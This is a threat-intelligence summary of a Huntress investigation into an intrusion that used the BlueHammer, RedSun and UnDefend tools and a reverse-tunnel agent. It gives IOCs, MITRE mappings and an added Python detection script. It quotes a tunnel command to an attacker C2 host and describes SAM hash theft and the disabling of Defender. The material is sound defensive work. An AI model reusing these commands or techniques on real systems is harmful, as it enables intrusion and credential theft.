Nightmare-Eclipse Tooling Seen in Real-World Intrusion

Huntress investigated a real-world intrusion that deployed Nightmare-Eclipse tooling (BlueHammer, RedSun, UnDefend) alongside a Go-based reverse tunnel agent dubbed BeigeBurrow, and linked the activity to likely compromised FortiGate SSL VPN credentials. Artifacts were staged in user-writable folders (Pictures and short Downloads subfolders); operators performed hands-on-keyboard reconnaissance, but privilege-escalation attempts largely failed. Defenders are urged to urgently review VPN logs, endpoint telemetry, and the specific filenames and indicators observed. #BlueHammer #BeigeBurrow

Keypoints

  • Huntress observed in-the-wild use of Nightmare-Eclipse tooling (BlueHammer, RedSun, UnDefend) during a live intrusion investigation.
  • Initial access is tied to likely compromised FortiGate SSL VPN credentials with sessions from multiple geolocated source IPs (including 78.29.48[.]29).
  • Malicious binaries were staged and executed from user-writable locations (Pictures and short Downloads subfolders) with filenames matching public PoC repositories (FunnyApp.exe, RedSun.exe, undef.exe, z.exe).
  • Operators performed hands-on-keyboard reconnaissance (whoami /priv, cmdkey /list, net group), but the observed BlueHammer/RedSun runs did not achieve successful privilege escalation or SAM extraction in this incident.
  • A Go-based yamux reverse-tunnel agent (BeigeBurrow, observed as agent.exe -server staybud.dpdns[.]org:443 -hide) provided follow-on tunneling/proxy capability for the adversary.
  • UnDefend disrupted Defender by locking signature files while running, but its effects are temporary (handles released when the process ends); Huntress recommends urgent hunting and incident response for any confirmed execution.

MITRE Techniques

  • [T1133] External Remote Services – Initial access via SSL VPN to a FortiGate firewall: ‘a threat actor initiated an SSL VPN connection to a FortiGate firewall from 78.29.48[.]29’
  • [T1078] Valid Accounts – Use of valid user credentials for remote access: ‘using credentials for the victim user account.’
  • [T1068] Exploitation for Privilege Escalation – BlueHammer and RedSun were used to attempt escalation to SYSTEM: ‘BlueHammer and RedSun can be used as privilege escalation techniques to take an attacker from an unprivileged account to SYSTEM.’
  • [T1003] OS Credential Dumping – BlueHammer targeted the SAM to extract NT hashes: ‘BlueHammer… parses the SAM hive itself, and decrypts each user’s NT hash (password representation).’
  • [T1543.003] Create or Modify System Process: Windows Service – RedSun achieves SYSTEM execution by placing TieringEngineService.exe in System32 and invoking a SYSTEM COM engine: ‘RedSun calls the Storage Tiers Management engine COM object… executes C:\Windows\System32\TieringEngineService.exe which is a copy of RedSun.’
  • [T1562.001] Impair Defenses: Disable or Modify Tools – UnDefend locks Defender signature files to prevent reload/restart: ‘UnDefend… locks mpavbase.vdm at the active signature location, preventing Defender from reloading its signature base on restart.’
  • [T1059] Command and Scripting Interpreter – Operator executed command-line enumeration (typical hands-on-keyboard activity): ‘whoami /priv, cmdkey /list, and net group.’
  • [T1087] Account Discovery – Adversary performed account/credential discovery to enumerate privileges and stored credentials: ‘cmdkey /list’ and ‘net group’ usage observed.
  • [T1090] Proxy – BeigeBurrow established a multiplexed reverse tunnel to a C2 (yamux) to relay connections: ‘agent.exe -server staybud.dpdns[.]org:443 -hide’

Indicators of Compromise

  • [File paths / Filenames] Staged and executed from user-writable locations – C:\Users\[REDACTED]\Pictures\FunnyApp.exe, C:\Users\[REDACTED]\Downloads\RedSun.exe, and 2 more files (undef.exe, z.exe)
  • [Command line] Tunneling agent invocation – agent.exe -server staybud.dpdns[.]org:443 -hide
  • [Domain] C2 / tunneling destination – staybud.dpdns[.]org
  • [IP addresses] Suspicious FortiGate SSL VPN source IPs – 78.29.48[.]29, 212.232.23[.]69, and 179.43.140[.]214
  • [File hash] Observed agent binary SHA-256 – a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c
  • [Detection name] Defender detections tied to observed activity – Exploit:Win32/DfndrPEBluHmr.BZ and EICAR alerts from unknown binaries
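As an added example (not code from the Huntress write-up), the following Python triage check tags process-creation events against the indicators listed above: staged binaries under a user's Pictures or Downloads tree, the BeigeBurrow agent invocation and domain, and the hands-on-keyboard recon commands. The event field names (`image`, `cmdline`) and the sample events are assumptions constructed for the demo.

```python
import re

# Indicators taken from the write-up; the domain is refanged for matching.
STAGED_NAMES = {"funnyapp.exe", "redsun.exe", "undef.exe", "z.exe"}
TUNNEL_HOST = "staybud.dpdns[.]org".replace("[.]", ".")
RECON_CMDS = ("whoami /priv", "cmdkey /list", "net group")
# User-writable staging locations seen in the intrusion (any depth below Downloads).
USER_DIR_RE = re.compile(r"^c:\\users\\[^\\]+\\(pictures|downloads)\\", re.I)


def classify(event):
    """Return the indicator tags matched by one process-creation event.

    event: dict with 'image' (full path of the executable) and 'cmdline'.
    """
    tags = []
    image = event.get("image", "")
    cmdline = event.get("cmdline", "")
    name = image.rsplit("\\", 1)[-1].lower()
    lowered = " ".join(cmdline.lower().split())

    # Known PoC filename executed from a user-writable folder.
    if name in STAGED_NAMES and USER_DIR_RE.match(image):
        tags.append("nightmare-eclipse-staged-binary")
    # BeigeBurrow invocation pattern: agent.exe -server <host>:<port> -hide
    if name == "agent.exe" and "-server" in lowered and "-hide" in lowered:
        tags.append("beigeburrow-tunnel-agent")
    if TUNNEL_HOST in lowered:
        tags.append("beigeburrow-c2-domain")
    # Enumeration commands observed during hands-on-keyboard activity.
    if any(cmd in lowered for cmd in RECON_CMDS):
        tags.append("hands-on-keyboard-recon")
    return tags


def scan(events):
    """Return (index, tags) for every event that matched at least one indicator."""
    hits = []
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            hits.append((i, tags))
    return hits


# Constructed sample telemetry (hypothetical user 'jdoe'), not data from the incident.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\jdoe\Pictures\FunnyApp.exe", "cmdline": "FunnyApp.exe"},
    {"image": r"C:\Users\jdoe\Downloads\a\agent.exe",
     "cmdline": "agent.exe -server staybud.dpdns.org:443 -hide"},
    {"image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami /priv"},
    {"image": r"C:\Program Files\App\FunnyApp.exe", "cmdline": "FunnyApp.exe"},
]
```

The last sample shows the location check at work: the same filename under Program Files does not fire, so the path context carries the signal, not the name alone.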


Read more: https://www.huntress.com/blog/nightmare-eclipse-intrusion